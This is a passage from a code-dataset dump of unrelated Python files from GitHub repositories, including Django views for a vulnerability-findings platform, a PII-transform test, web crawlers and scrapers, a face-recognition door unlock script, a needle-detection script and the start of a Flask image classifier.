Missing evidence image ID',\n 'error', request)\n return HttpResponse(\"Error - Unsent image ID\",\n content_type=\"text/html\")\n key_list = key_existing_list(f'{project.lower()}/{findingid}/{fileid}')\n if key_list:\n for k in key_list:\n start = k.find(findingid) + len(findingid)\n localfile = \"/tmp\" + k[start:]\n ext = {'.png': '.tmp', '.gif': '.tmp'}\n localtmp = util.replace_all(localfile, ext)\n CLIENT_S3.download_file(BUCKET_S3, k, localtmp)\n return retrieve_image(request, localtmp)\n else:\n return util.response([], 'Access denied or evidence not found', True)\n else:\n util.cloudwatch_log(\n request,\n 'Security: Attempted to retrieve evidence without permission')\n return util.response([], 'Access denied or evidence not found', True)\n\n\ndef retrieve_image(request, img_file):\n if util.assert_file_mime(img_file, [\"image/png\", \"image/jpeg\",\n \"image/gif\"]):\n with open(img_file, \"rb\") as file_obj:\n mime = Magic(mime=True)\n mime_type = mime.from_file(img_file)\n return HttpResponse(file_obj.read(), content_type=mime_type)\n else:\n rollbar.report_message('Error: Invalid evidence image format',\n 'error', request)\n return HttpResponse(\"Error: Invalid evidence image format\",\n content_type=\"text/html\")\n\n\ndef key_existing_list(key):\n \"\"\"return the 
key's list if it exist, else list empty\"\"\"\n return util.list_s3_objects(CLIENT_S3, BUCKET_S3, key)\n\n\ndef delete_project(project):\n \"\"\"Delete project information.\"\"\"\n project = project.lower()\n are_users_removed = remove_all_users_access(project)\n are_findings_masked = [\n finding_domain.mask_finding(finding_id)\n for finding_id in project_domain.list_findings(project)]\n update_project_state_db = project_domain.update(project, {'project_status': 'FINISHED'})\n is_project_deleted = all([\n are_findings_masked, are_users_removed, update_project_state_db])\n util.invalidate_cache(project)\n\n return is_project_deleted\n\n\ndef remove_all_users_access(project):\n \"\"\"Remove user access to project.\"\"\"\n user_active = project_domain.get_users(project)\n user_suspended = project_domain.get_users(project, active=False)\n all_users = user_active + user_suspended\n are_users_removed = True\n for user in all_users:\n is_user_removed = project_domain.remove_user_access(project, user, 'customeradmin')\n if is_user_removed:\n are_users_removed = True\n else:\n are_users_removed = False\n break\n return are_users_removed\n\n\n@cache_content\n@never_cache\n@csrf_exempt\n@require_http_methods([\"GET\"])\n@authorize(['analyst', 'admin'])\ndef download_vulnerabilities(request, findingid):\n \"\"\"Download a file with all the vulnerabilities.\"\"\"\n if not has_access_to_finding(request.session['username'], findingid,\n request.session['role']):\n util.cloudwatch_log(request,\n 'Security: \\\nAttempted to retrieve vulnerabilities without permission')\n return util.response([], 'Access denied', True)\n else:\n finding = get_vulnerabilities_by_type(findingid)\n data_yml = {}\n vuln_types = {'ports': dict, 'lines': dict, 'inputs': dict}\n if finding:\n for vuln_key, cast_fuction in list(vuln_types.items()):\n if finding.get(vuln_key):\n data_yml[vuln_key] = list(map(cast_fuction, list(finding.get(vuln_key))))\n else:\n # This finding does not have this type of vulnerabilities\n pass\n else:\n # This finding does not have new vulnerabilities\n pass\n project = finding_domain.get_finding(findingid)['projectName']\n file_name = '/tmp/{project}-{finding_id}.yaml'.format(\n finding_id=findingid, project=project)\n stream = open(file_name, 'w')\n yaml.safe_dump(data_yml, stream, default_flow_style=False)\n try:\n with open(file_name, 'rb') as file_obj:\n response = HttpResponse(file_obj.read(), content_type='text/x-yaml')\n response['Content-Disposition'] = \\\n 'attachment; filename=\"{project}-{finding_id}.yaml\"'.format(\n finding_id=findingid, project=project)\n return response\n except IOError:\n rollbar.report_message('Error: Invalid vulnerabilities file format', 'error', request)\n return util.response([], 'Invalid vulnerabilities file format', True)\n\n\n@never_cache\n@require_http_methods([\"GET\"])\n# pylint: disable=too-many-locals\ndef generate_complete_report(request):\n user_data = util.get_jwt_content(request)\n projects = user_domain.get_projects(user_data['user_email'])\n book = load_workbook('/usr/src/app/app/techdoc/templates/COMPLETE.xlsx')\n sheet = book.active\n\n project_col = 1\n finding_col = 2\n vuln_where_col = 3\n vuln_specific_col = 4\n treatment_col = 5\n treatment_mgr_col = 6\n row_offset = 2\n\n row_index = row_offset\n for project in projects:\n findings = project_domain.get_released_findings(\n project, 'finding_id, finding, treatment')\n for finding in findings:\n vulns = finding_dal.get_vulnerabilities(finding['finding_id'])\n for vuln in vulns:\n 
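# one worksheet row per vulnerability; openpyxl's cell() takes 1-based (row, column, value)\n                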
sheet.cell(row_index, vuln_where_col, vuln['where'])\n                sheet.cell(row_index, vuln_specific_col, vuln['specific'])\n\n                sheet.cell(row_index, project_col, project.upper())\n                sheet.cell(row_index, finding_col, '{name!s} (#{id!s})'.format(\n                    name=finding['finding'],\n                    id=finding['finding_id']))\n                sheet.cell(row_index, treatment_col, finding['treatment'])\n                sheet.cell(row_index, treatment_mgr_col,\n                           vuln.get('treatment_manager', 'Unassigned'))\n\n                row_index += 1\n\n    username = user_data['user_email'].split('@')[0]\n    filename = 'complete_report.xlsx'\n    filepath = '/tmp/{username}-{filename}'.format(filename=filename,\n                                                   username=username)\n    book.save(filepath)\n\n    with open(filepath, 'rb') as document:\n        response = HttpResponse(document.read())\n        response['Content-Type'] = ('application/vnd.openxmlformats'\n                                    '-officedocument.spreadsheetml.sheet')\n        response['Content-Disposition'] = 'inline;filename={filename}'.format(\n            filename=filename)\n    return response\n\n\n@cache_content\n@never_cache\n@authorize(['admin'])\ndef export_all_vulnerabilities(request):\n    user_data = util.get_jwt_content(request)\n    filepath = generate_all_vulns_xlsx(user_data['user_email'])\n    filename = os.path.basename(filepath)\n    with open(filepath, 'rb') as document:\n        response = HttpResponse(document.read())\n        response['Content-Type'] = ('application/vnd.openxmlformats'\n                                    '-officedocument.spreadsheetml.sheet')\n        response['Content-Disposition'] = 'inline;filename={filename}'.format(\n            filename=filename)\n    return response\n\n\n@cache_content\n@never_cache\n@authorize(['admin'])\ndef export_users(request):\n    user_data = util.get_jwt_content(request)\n    book = Workbook()\n    sheet = book.active\n    sheet.append(['full_name', 'user_email'])\n    row_index = 2\n\n    unique_users = []\n    for user in user_dal.get_platform_users():\n        user_email = user['user_email'].lower()\n        if user_email not in unique_users:\n            unique_users.append(user_email)\n\n            name_attrs = user_domain.get_attributes(\n                user_email, ['first_name', 'last_name'])\n            full_name = ' '.join(list(name_attrs.values()))\n\n            sheet.cell(row_index, 1, full_name)\n            sheet.cell(row_index, 2, user_email)\n            row_index += 1\n\n    username = user_data['user_email'].split('@')[0]\n    filepath = f'/tmp/{username}-users.xlsx'\n    filename = os.path.basename(filepath)\n    book.save(filepath)\n\n    with open(filepath, 'rb') as document:\n        response = HttpResponse(document.read())\n        response['Content-Type'] = ('application/vnd.openxmlformats'\n                                    '-officedocument.spreadsheetml.sheet')\n        response['Content-Disposition'] = f'inline;filename={filename}'\n    return response\n","repo_name":"tom-vanbraband-sonarsource/integrates","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3112999207","text":"\"\"\"\nTest the PiiSubstitutionValue class\n\"\"\"\n\nfrom pathlib import Path\n\nimport tempfile\nimport pytest\n\nfrom typing import Dict\n\nfrom pii_data.types.piicollection import PiiCollectionLoader\nfrom pii_data.types.doc.localdoc import BaseLocalSrcDocument, LocalSrcDocumentFile\nfrom pii_data.helper.io import load_yaml\n\nimport pii_transform.api.transform as mod\n\n\nDATADIR = Path(__file__).parents[2] / \"data\"\n\n\ndef save_load(doc: BaseLocalSrcDocument) -> Dict:\n    try:\n        f = tempfile.NamedTemporaryFile(mode=\"wt\", suffix=\".yml\", delete=False)\n        doc.dump(f, format=\"yml\")\n        f.close()\n        return 
load_yaml(f.name)\n finally:\n Path(f.name).unlink()\n\n\n# -----------------------------------------------------------------------\n\n\ndef test10_constructor():\n \"\"\"\n Test constructing the object\n \"\"\"\n m = mod.PiiTransformer()\n assert str(m) == \"\"\n\n\ndef test20_process_seq():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-seq-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-seq-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-seq-repl.yaml\")\n assert exp == got\n\n\ndef test30_process_tree():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-tree-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-tree-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-tree-repl.yaml\")\n assert exp == got\n\n\ndef test40_process_table():\n \"\"\"\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-table-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-table-pii.json\")\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-table-repl.yaml\")\n assert exp == got\n\n\n\ndef test50_process_seq_ignore():\n \"\"\"\n Modify the PII collection to ignore some of the fields\n \"\"\"\n doc = LocalSrcDocumentFile(DATADIR / \"minidoc-example-seq-orig.yaml\")\n pii = PiiCollectionLoader()\n pii.load_json(DATADIR / \"minidoc-example-seq-ignore-pii.json\")\n\n m = mod.PiiTransformer()\n result = m(doc, pii)\n\n got = save_load(result)\n exp = load_yaml(DATADIR / \"minidoc-example-seq-ignore-repl.yaml\")\n assert exp == got\n","repo_name":"piisa/pii-transform","sub_path":"test/unit/api/test_transform.py","file_name":"test_transform.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"16002080295","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom crawlers.utils import get_datefmt_text, check_contain_datefmt_text\nimport subprocess\nimport yaml\nimport os\nimport platform\n\n\nclass Crawler:\n def __init__(self, wait_time: int=10):\n with open(os.path.join('config', 'config.yaml')) as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n self.chrome_path = config['chrome_path']\n self.driver = None\n self.wait = None\n self.wait_time = wait_time\n\n def open(self, url: str, driver_path: str):\n if platform.system().lower().startswith('window'):\n subprocess.Popen(\n r'{} --remote-debugging-port=9222 --user-data-dir=\"C:\\chrometemp\"'.format(self.chrome_path))\n option = Options()\n option.add_experimental_option(\"debuggerAddress\", \"127.0.0.1:9222\")\n self.driver = webdriver.Chrome(driver_path, options=option)\n else:\n self.driver = webdriver.Chrome(driver_path)\n\n self.wait = WebDriverWait(self.driver, self.wait_time)\n self.driver.get(url)\n\n @property\n def all_reviews_num(self):\n return int(self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[1]/div[2]/div[1]/h4/span'))).text)\n\n def get_info(self, wait: bool):\n if not wait:\n 
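# a zero-second wait makes the element lookups below fail fast instead of polling\n            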
self.wait = WebDriverWait(self.driver, 0)\n\n        # drop the trailing ' [more]' marker as a complete suffix (rstrip would strip any run of those characters)\n        reviews = [i.text[:-len(' [more]')] if i.text.endswith(' [more]') else i.text for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'conWrap')))]\n\n        try:\n            scores = [i.text for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'scoreNum')))]\n            score_texts = [i.text for i in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'scoreTxt')))]\n\n            if len(scores) != len(reviews):\n                for _ in range(len(reviews) - len(scores)):\n                    scores.append('-')\n                    score_texts.append('-')\n        except Exception:\n            scores = ['-' for _ in range(len(reviews))]\n            score_texts = ['-' for _ in range(len(reviews))]\n\n        dates = []\n\n        for element in self.wait.until(EC.presence_of_all_elements_located((By.CLASS_NAME, 'txt'))):\n            text = element.text\n            if check_contain_datefmt_text(text):\n                dates.append(get_datefmt_text(text))\n\n        return {'date': dates, 'score': scores, 'score_category': score_texts, 'review': reviews}\n\n    def get_pages_list(self):\n        pages = []\n        for text in self.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'pageNumBox'))).text.split('\\n'):\n            if text.isnumeric():\n                pages.append(int(text))\n\n        return pages\n\n    def click_page(self, page: int):\n        self.wait.until(EC.element_to_be_clickable((By.XPATH, f'/html/body/section/div/section/div[2]/ul/li[{page}]'))).click()\n\n    def click_pagemovebar(self, point: str):\n        if point == 'left':\n            self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[2]/button[1]'))).click()\n        elif point == 'right':\n            self.wait.until(EC.element_to_be_clickable((By.XPATH, '/html/body/section/div/section/div[2]/button[2]'))).click()\n        else:\n            raise Exception('Invalid pagemovebar')\n\n    def quit(self):\n        self.driver.quit()\n","repo_name":"limkaram/ReviewCrawler","sub_path":"crawlers/InterparkCrawler.py","file_name":"InterparkCrawler.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39106901928","text":"# read values from data file\nfile_path = 'Day 1/Data.txt'\nfile = open(file_path, 'r')\nstrings = file.readlines()\n# cast strings from data file to ints\nints = []\nfor string in strings:\n\tints.append(int(string))\n# sum all value triples to find x + y + z = 2020\ndef search(ints):\n\tfor x in ints:\n\t\tfor y in ints:\n\t\t\tfor z in ints:\n\t\t\t\tif (x + y + z) == 2020:\n\t\t\t\t\tresult = x * y * z\n\t\t\t\t\treturn result\n\nresult = search(ints)\nprint(result)","repo_name":"corygrube/Advent-of-Code-2020","sub_path":"Day 1/Day 1.2.py","file_name":"Day 1.2.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72279816890","text":"from collections import OrderedDict\nfrom bs4 import BeautifulSoup\nimport requests\n\n\nclass Horoscope:\n    def __init__(self):\n        self.d = OrderedDict(\n            {(1,19):10,\n            (2,18):11,\n            (3,20):12,\n            (4,19):1,\n            (5,20):2,\n            (6,20):3,\n            (7,22):4,\n            (8,22):5,\n            (9,22):6,\n            (10,22):7,\n            (11,21):8,\n            (12,21):9})\n    \n    def get_date(self):\n        month = int(input('What month were you born? Please put the number of the month, for example, if you were born in April, you would input 4. '))\n        day = int(input('What day were you born? 
'))\n return (month,day)\n \n def get_sign(self, date):\n for k in self.d.keys():\n if date <= k:\n return self.d[k]\n return self.d[(1,19)]\n \n def get_horoscope(self):\n date = self.get_date()\n sign = str(self.get_sign(date))\n url = 'https://www.horoscope.com/us/horoscopes/general/horoscope-general-daily-today.aspx?sign={}'.format(sign)\n response = requests.get(url)\n html = response.content\n\n soup = BeautifulSoup(html, 'lxml')\n return soup.body.p.text\n\n\nh = Horoscope()\nh.get_horoscope()","repo_name":"joepatten/horoscope","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41354324344","text":"import pandas as pd\r\nimport cv2\r\nimport urllib.request\r\nimport numpy as np\r\nimport os\r\nfrom datetime import datetime\r\nimport face_recognition\r\nimport requests\r\n\r\npath = r'E:\\code\\face_recognition\\image_folder'\r\nimgUrl = 'http://192.168.137.162/cam-hi.jpg'\r\nokRqstUrl = 'http://192.168.137.154/?message=1'\r\nnoRqstUrl = 'http://192.168.137.154/?message=10'\r\nauthorized_dushan= 0\r\nauthorized_saman= 0\r\nauthorized_tharindu= 0\r\n\r\nif 'Attendance.csv' in os.listdir(os.path.join(os.getcwd(), 'attendace')):\r\n print(\"There is an existing attendance file.\")\r\n os.remove(\"Attendance.csv\")\r\nelse:\r\n df = pd.DataFrame(list())\r\n df.to_csv(\"Attendance.csv\")\r\n\r\nimages = []\r\nclassNames = []\r\nmyList = os.listdir(path)\r\nprint(myList)\r\nfor cl in myList:\r\n curImg = cv2.imread(f'{path}/{cl}')\r\n images.append(curImg)\r\n classNames.append(os.path.splitext(cl)[0])\r\nprint(classNames)\r\n\r\n\r\ndef findEncodings(images):\r\n encodeList = []\r\n for img in images:\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n encode = face_recognition.face_encodings(img)[0]\r\n encodeList.append(encode)\r\n return encodeList\r\n\r\n\r\ndef markAttendance(name):\r\n global authorized_dushan, authorized_saman, authorized_tharindu\r\n with open(\"Attendance.csv\", 'r+') as f:\r\n myDataList = f.readlines()\r\n nameList = []\r\n for line in myDataList:\r\n entry = line.split(',')\r\n nameList.append(entry[0])\r\n if name not in nameList:\r\n now = datetime.now()\r\n dtString = now.strftime('%H:%M:%S')\r\n f.writelines(f'\\n{name},{dtString}')\r\n \r\n if name==\"Tharindu\":\r\n authorized_tharindu=1\r\n elif name==\"Saman\":\r\n authorized_saman=1\r\n elif name==\"Dushan\":\r\n authorized_dushan=1\r\n if authorized_dushan+authorized_saman+authorized_tharindu>= 3:\r\n f.writelines(',Door Opened')\r\n\r\n\r\nencodeListKnown = findEncodings(images)\r\nprint('Encoding Complete')\r\n\r\nwhile True:\r\n img_resp = urllib.request.urlopen(imgUrl)\r\n imgnp = np.array(bytearray(img_resp.read()), dtype=np.uint8)\r\n img = cv2.imdecode(imgnp, -1)\r\n\r\n imgS = cv2.resize(img, (0, 0), None, 0.25, 0.25)\r\n imgS = cv2.cvtColor(imgS, cv2.COLOR_BGR2RGB)\r\n\r\n facesCurFrame = face_recognition.face_locations(imgS)\r\n encodesCurFrame = face_recognition.face_encodings(imgS, facesCurFrame)\r\n\r\n for encodeFace, faceLoc in zip(encodesCurFrame, facesCurFrame):\r\n matches = face_recognition.compare_faces(encodeListKnown, encodeFace)\r\n faceDis = face_recognition.face_distance(encodeListKnown, encodeFace)\r\n matchIndex = np.argmin(faceDis)\r\n\r\n if matches[matchIndex]:\r\n name = classNames[matchIndex].upper()\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, 
y2), (0, 255, 0), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 255, 0), cv2.FILLED)\r\n cv2.putText(img, name, (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\r\n markAttendance(name)\r\n else:\r\n # Unrecognized face\r\n y1, x2, y2, x1 = faceLoc\r\n y1, x2, y2, x1 = y1 * 4, x2 * 4, y2 * 4, x1 * 4\r\n cv2.rectangle(img, (x1, y1), (x2, y2), (0, 0, 255), 2)\r\n cv2.rectangle(img, (x1, y2 - 35), (x2, y2), (0, 0, 255), cv2.FILLED)\r\n cv2.putText(img, 'Unrecognized', (x1 + 6, y2 - 6), cv2.FONT_HERSHEY_COMPLEX, 1, (255, 255, 255), 2)\r\n if authorized_dushan+authorized_saman+authorized_tharindu>= 3:\r\n print('Door Opened')\r\n response = requests.get(okRqstUrl)\r\n\r\n if response.status_code == 200:\r\n print(\"Response content:\")\r\n print(response.text)\r\n authorized_dushan= 0\r\n authorized_saman= 0\r\n authorized_tharindu= 0\r\n else:\r\n print(\"Request failed with status code:\", response.status_code)\r\n \r\n else:\r\n print('No')\r\n response = requests.get(noRqstUrl)\r\n\r\n if response.status_code == 200:\r\n print(\"Response content:\")\r\n print(response.text)\r\n else:\r\n print(\"Request failed with status code:\", response.status_code)\r\n\r\n cv2.imshow('Webcam', img)\r\n key = cv2.waitKey(5)\r\n if key == ord('q'):\r\n break\r\n\r\ncv2.destroyAllWindows()","repo_name":"APTlakshan/DoorLockingAndAlertingSystemWithAI","sub_path":"sampleFaceRecognitionCode.py","file_name":"sampleFaceRecognitionCode.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24747208489","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 30 10:17:18 2017\n\n@author: erikb\n\"\"\"\n\nimport nltk\nfrom icrawler.builtin import GoogleImageCrawler, BingImageCrawler, BaiduImageCrawler, GreedyImageCrawler\n\nclass NounParser:\n\n def parse(self, sentence):\n nouns = []\n word_tokens = nltk.tag.pos_tag(nltk.word_tokenize(sentence))\n #if the word is a noun of pural noun add to list\n for word_tuple in word_tokens:\n if word_tuple[1] == 'NN' or word_tuple[1] == 'NS':\n nouns.append(word_tuple[0])\n \n return nouns\n \n \nclass Crawler:\n def __init__(self, width=800, height=600, num_pics = 10):\n self.min_height = height\n self.min_width = width\n self.num_of_images = num_pics\n \n def setMinResolution(self, min_width, min_height):\n self.min_width = min_width\n self.min_height = min_height\n \n def setNumOfImages(self, num):\n self.num_of_images = num\n \n def getImagesFromDomain(self, query, domain_url, num_pics): \n greedy_crawler = GreedyImageCrawler()\n greedy_crawler.crawl(domains=domain_url, max_num=self.num_of_images,\n min_size=(self.min_width,self.min_height), max_size=None)\n \n def Search(self, query):\n print(\"Using Google as a Default Implementation\")\n \nclass GoogleSearch(Crawler):\n def __init__(self, width, height, num_pics):\n Crawler.__init__(self, width, height)\n \n def Search(self, query):\n self.getImagesFromGoogle(query)\n \n def getImagesFromGoogle(self, query):\n google_crawler = GoogleImageCrawler(parser_threads=2, downloader_threads=4, storage={'root_dir': query+\"_images\"})\n google_crawler.crawl(keyword=query, max_num=self.num_of_images,\n date_min=None, date_max=None,\n min_size=(self.min_width,self.min_height), max_size=None)\nclass BingSearch(Crawler):\n def __init__(self, width, height, num_pics):\n Crawler.__init__(self, width, height)\n \n def Search(self, query):\n self.getImagesFromBing(query)\n \n def getImagesFromBing(self, 
query): \r\n        bing_crawler = BingImageCrawler(downloader_threads=4)\r\n        bing_crawler.crawl(keyword=query, offset=0, max_num=self.num_of_images,\r\n                           min_size=(self.min_width,self.min_height), max_size=None)\r\n    \r\nclass BaiduSearch(Crawler):\r\n    def __init__(self, width, height, num_pics):\r\n        Crawler.__init__(self, width, height)\r\n    \r\n    def Search(self, query):\r\n        self.getImagesFromBaidu(query)\r\n    \r\n    def getImagesFromBaidu(self, query):\r\n        baidu_crawler = BaiduImageCrawler()\r\n        baidu_crawler.crawl(keyword=query, offset=0, max_num=self.num_of_images,\r\n                            min_size=(self.min_width,self.min_height), max_size=None)\r\n\r\n\r\nclass Main:\r\n    def __init__(self):\r\n        self.noun_parser = NounParser()\r\n        self.crawler = Crawler()\r\n        self.height = 600\r\n        self.width = 800\r\n        self.num_pics = 10\r\n        self.keep_searching = True\r\n        #CONSTANTS \r\n        self.GOOGLE = 1\r\n        self.BING = 2\r\n        self.BAIDU = 3\r\n        self.DOMAINSEARCH = 4\r\n    \r\n    def getInputOption(self):\r\n        return int(input(\" [1] Search Google \\n [2] Search Bing \\n [3] Search Baidu \\n [4] Search URL Domain \\n [5] STOP \\n\" + \\\r\n                         \"[6] Change Settings\"))\r\n    \r\n    def setSettings(self):\r\n        choice = int(input(\" [1] Set min resolution \\n [2] Set number of pictures per noun \\n\"))\r\n        if(choice == 1):\r\n            self.width = int(input(\"Min width: \"))\r\n            self.height = int(input(\"Min height: \"))\r\n        elif(choice == 2):\r\n            self.num_pics = int(input(\"Number of pictures per noun: \"))\r\n        else:\r\n            print(\"Enter a correct number\")\r\n    \r\n    def handleSearch(self, search_engine, nouns, domain=\"\"):\r\n        if(search_engine == self.GOOGLE):\r\n            self.crawler = GoogleSearch(self.width, self.height, self.num_pics)\r\n        elif(search_engine == self.BING):\r\n            self.crawler = BingSearch(self.width, self.height, self.num_pics)\r\n        elif(search_engine == self.BAIDU):\r\n            self.crawler = BaiduSearch(self.width, self.height, self.num_pics)\r\n        else: #breaking point\r\n            num_pics = int(input(\"Number of pictures: \"))\r\n            self.crawler.getImagesFromDomain(nouns, domain, num_pics)\r\n            return\r\n        \r\n        for noun in nouns:\r\n            self.crawler.Search(noun)\r\n    \r\n    \r\n    def main(self):\r\n        while self.keep_searching:\r\n            option = self.getInputOption()\r\n            domain = \"\"\r\n            if(option == 4):\r\n                domain = input(\"Enter a URL to search: \")\r\n            \r\n            if(option <= 4): #searching for images \r\n                query = input(\"Enter a sentence: \")\r\n                nouns = self.noun_parser.parse(query)\r\n                self.handleSearch(option, nouns, domain)\r\n            elif(option == 6):\r\n                self.setSettings()\r\n            else:\r\n                print(\"STOPPING - LATER\")\r\n                self.keep_searching = False\r\n    \r\n\r\ni = Main()\r\ni.main()","repo_name":"ebarns/ImageGrabber","sub_path":"imageGrabber.py","file_name":"imageGrabber.py","file_ext":"py","file_size_in_byte":5197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22681186200","text":"from needle_detection.preprocessing import read_frame, get_ROI\r\nfrom needle_detection.kernels import filter_kernel_parameters, build_gauss_kernel, build_sobel_kernel, convolution\r\nfrom needle_detection.line_detection import line_detector, build_probe_lines\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport needle_detection.parameters as p\r\nfrom skimage.draw import disk, line\r\nangle = p.angles[4]\r\n\r\n\r\nframe = read_frame('../needle_detection/resources/test/30.png')\r\nROI, rescale_factor = get_ROI(frame, angle)\r\n\r\nsigma_x, sigma_y, n = filter_kernel_parameters(frame) \r\n\r\ngauss_kernel = build_gauss_kernel(sigma_x, sigma_y, angle)\r\nsobel_kernel = build_sobel_kernel(n, angle)\r\nconvolved_kernels = convolution(sobel_kernel, gauss_kernel)\r\n\r\n\r\nfiltered_frame = 
convolution(ROI, convolved_kernels)\r\n\r\n\r\nprob_lines, num_lines, all_bs, all_ms, delta_b, y_pts, line_lengths, x_limits = build_probe_lines(filtered_frame, angle, rescale_factor)\r\n\r\nline_b, line_m, line_x, line_y, tip_x, tip_y, intensity_along_line, intensity_along_line_diff, diff_min_x, diff_min_y = line_detector(frame, num_lines, prob_lines, x_limits, line_lengths, y_pts, delta_b, rescale_factor, frame, all_bs, all_ms)\r\n\r\n\r\n#tip_x = int(round(diff_min_x/rescale_factor))\r\n#tip_y = int(round(diff_min_y/rescale_factor))\r\ncircle_y, circle_x = disk([tip_y, tip_x], 12)\r\nframe[circle_y, circle_x] = 255\r\n\r\nfor t in range(-3, 3):\r\n frame[line_y+t, line_x] = 255\r\n\r\n\r\nf, (ax1, ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10,6))\r\nax1.imshow(frame, cmap='gray')\r\nax2.imshow(filtered_frame, cmap='gray')\r\nplt.savefig('172_line.png', dpi=300)\r\nplt.show()\r\nplt.close()","repo_name":"janwolzenburg/us-detection-biopsy-needle","sub_path":"examples/process_single_frame.py","file_name":"process_single_frame.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30081222943","text":"#Import required libraries\r\n\r\nimport base64\r\nimport os\r\nimport pickle\r\nfrom io import BytesIO\r\nfrom PIL import Image, ImageDraw, ImageFont\r\nfrom flask import Flask, request, render_template, redirect, url_for, flash\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport shutil\r\n\r\n\r\nPYTHONUNBUFFERED = \"anything_her\"\r\n\r\napp = Flask(__name__)\r\napp.secret_key = 'abababab123456'\r\n\r\n\r\n\r\napp.config['UPLOAD_FOLDER'] = r'upload/'\r\nupload_dir = app.config['UPLOAD_FOLDER']\r\napp.config['MODEL_FOLDER'] = r'model/'\r\nmodel_dir = app.config['MODEL_FOLDER']\r\n\r\nlabel_encoder_name = 'label_encoder.pkl'\r\nmodel_name = 'model.h5'\r\ndef load_custom_dataset(data_dir):\r\n # Load the image filenames and labels\r\n filenames = []\r\n labels = []\r\n for label in os.listdir(data_dir):\r\n label_dir = os.path.join(data_dir, label)\r\n for file in os.listdir(label_dir):\r\n filenames.append(os.path.join(label_dir, file))\r\n labels.append(label)\r\n\r\n # Convert the labels to integers\r\n num_classes = len(set(labels))\r\n label_encoder = LabelEncoder()\r\n labels = label_encoder.fit_transform(labels)\r\n # Save the label encoder object to a file\r\n\r\n with open(os.path.join(model_dir, label_encoder_name), 'wb') as f:\r\n pickle.dump(label_encoder, f)\r\n\r\n # Preprocess the dataset\r\n image_size = 299\r\n images = []\r\n one_hot_labels = []\r\n for filename, label in zip(filenames, labels):\r\n # Load and decode the image\r\n image = tf.io.read_file(filename)\r\n image = tf.image.decode_image(image, channels=3)\r\n\r\n # Resize the image to a fixed size\r\n image = tf.image.resize(image, (image_size, image_size))\r\n\r\n # Normalize the pixel values to the range [0, 1]\r\n image = image / 255.0\r\n\r\n # Convert the label to one-hot encoding\r\n label = tf.one_hot(label, num_classes)\r\n\r\n images.append(image)\r\n one_hot_labels.append(label)\r\n\r\n # Split the dataset into training and test sets\r\n x_train, x_test, y_train, y_test = train_test_split(images, one_hot_labels, test_size=0.2, shuffle=True)\r\n\r\n # Return the training and test data as tuples\r\n return (x_train, y_train), (x_test, y_test), num_classes\r\n\r\n@app.route('/', methods=['GET', 
